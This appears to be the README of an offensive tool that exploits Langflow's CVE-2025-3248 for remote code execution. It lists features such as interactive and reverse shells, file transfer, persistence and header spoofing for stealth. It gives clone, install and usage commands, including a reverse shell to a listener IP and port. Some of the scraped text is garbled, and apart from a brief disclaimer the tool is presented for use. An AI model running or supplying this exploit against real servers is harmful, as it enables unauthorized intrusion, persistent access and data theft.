
Remote Code Execution Exploit for Langflow (CVE-2025-3248) - [ By S4Tech ]
Remote Code Execution Exploit for Langflow (CVE-2025-3248)
persist command)upload local_path remote_pathdownload remote_path local_pathclear command for terminalUser-AgentX-Forwarded-For IPsexploit_log.txt.langflow_shell_history)requestscoloramareadlinegit clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt
python exploit.py <URL> [options]
python exploit.py http://target.com
python exploit.py http://target.com --shell
python exploit.py http://target.com --command "whoami"
python exploit.py http://target.com --reverse 192.168.1.100 4444
Image.png)
âڑ ï¸ڈ This tool is for educational and authorized testing purposes only.
âڑ ï¸ڈ Unauthorized use against systems you don't own or have permission to test is illegal.
This project is licensed under the MIT License - see the LICENSE file for details.
Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.
| Feature | v1.0 | v2.0 |
|---|
| Payload Methods | 1 | 5 |
| File Transfer | ❌ Not supported | ✅ Supported |
| Persistence | ❌ | ✅ |
| Stealth Level | Basic | Advanced |
| Session Logging | ❌ | ✅ |
| Option | Description |
|---|
--shell | Start interactive shell |
--reverse IP PORT | Launch reverse shell to specified IP:PORT |
--command CMD | Execute single command |
--verbose | Enable verbose output |
--timeout SEC | Set request timeout (default: 10s) |